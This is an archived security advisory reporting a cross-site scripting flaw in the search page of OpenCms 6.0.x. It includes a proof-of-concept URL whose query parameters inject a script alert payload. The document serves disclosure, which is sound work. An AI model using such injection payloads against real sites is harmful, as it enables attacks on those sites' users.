Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: b06-2434.htm

OpenCms version 6.0.x Xml Content Demo search engine Cross site scripting



OpenCms version 6.0.x Xml Content Demo search engine Cross site scripting
OpenCms version 6.0.x Xml Content Demo search engine Cross site scripting



Version: Tested on:=0D
          - 6.0.0=0D
          - 6.0.2=0D
          - 6.0.3=0D
=0D
Discovered by: jaime.blasco(at)eazel(dot).es=0D
http://www.eazel.es=0D 
=0D
Description: 	=0D
Input passed to the search query in the Xml Content Demo search engine isn't properly sanitised. This can be exploited to conduct cross-site scripting attacks.=0D
Example:=0D
=0D
http://host/opencms/opencms/system/modules/org.opencms.frontend.templateone/pages/search.html?action=search&query=%22%3E%3Cscript%3Ealert%28'www.eazel.es'%29%3C%2Fscript%3E%3C!-&index=Online+project+%28VFS%29&page=1&uri=%2Fxmlcontentdemo%2Fside_element_demo.html&__locale=en&query2=%3Cscript%3Ealert%28a%29%3C%2Fscript%3E =0D 
=0D
Original advisory: http://www.eazel.es/media/advisory002-OpenCms-Xml-Content-Demo-search-engine-Cross-site-scripting.html=0D 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH